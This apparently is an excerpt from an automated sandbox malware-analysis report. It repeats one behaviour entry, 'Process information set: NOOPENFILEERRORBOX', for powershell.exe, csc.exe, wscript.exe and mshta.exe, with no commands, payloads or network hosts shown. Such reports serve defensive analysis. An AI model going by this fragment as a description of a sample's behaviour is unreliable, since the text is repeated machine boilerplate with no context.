              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
